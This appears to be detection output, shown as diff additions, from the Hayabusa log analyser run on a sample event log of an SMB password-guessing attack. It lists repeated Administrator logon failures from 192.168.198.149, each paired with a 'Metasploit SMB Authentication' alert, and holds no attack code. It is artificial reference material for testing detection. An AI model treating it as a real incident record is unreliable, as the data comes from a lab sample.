+2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HV17iXOYQqs2ntax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esZnEeyGdPa22PsL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rlYFTP9a2wdi5A2n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oJifU0PnO1Ntp6z3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGKdKjJy28Qd1whT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x3L4BYjYJYlvuYHE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ui5RoLKttDo0wfFJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G2xjdWobsxBjo6p7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TPeQ0M5lXITI84G3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uu72qx4lG5ZRM7xf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zD072YR1hIgbzjaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EqA7HDvImIlCiFq2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: efYFxZwMGEC3vVi7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6WmMHYegvFJvv6zd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DS9WkRnP0B5MgaeX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5jNPV7ZgFExgg9n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1FJ6vm3wK97iual  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GLuIx0sfF8NQD8QY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y3lMvcrrmGTkjdlh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ZqOabcNMeazs6TC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2AbE9D8PvuFDBz5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wzWdLEEc68ZvviGh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AtV3BuZiljbAeikO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tnKKfcwikNDdYOam  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jSbbzD7fpJY4Q1JL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gOASpLLE25ruCnGW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1jhUGOtszbPUwccL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yB8Mzo1RppdpLFKS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rOwoUlHGVeSbAhuN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BXIEHbkrjwedeaih  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OvsKoixgEzUgAyie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TzaZe6Y4Tdfjseuk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FEmbuU3CAC3CecZy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kfBmqmVPd0CGVUsD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Uz3TlU6yrcveM1w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z6hH6AkkgBFmeZ6u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J2J1W2WhA6Pj7j5j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: soHOxnkoOn7ot0My  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4c2oWI6mRIvSVSKq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FKsXD8aTyaC4fBqq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qrzji5ucmutsZNpo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BApOU105FCLwj4zn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EO50f7NfrrdwwCNA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PfTYbWC8IjW87th8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wLnE6zm5US4maK04  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5AV7taC7hYQdVjAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
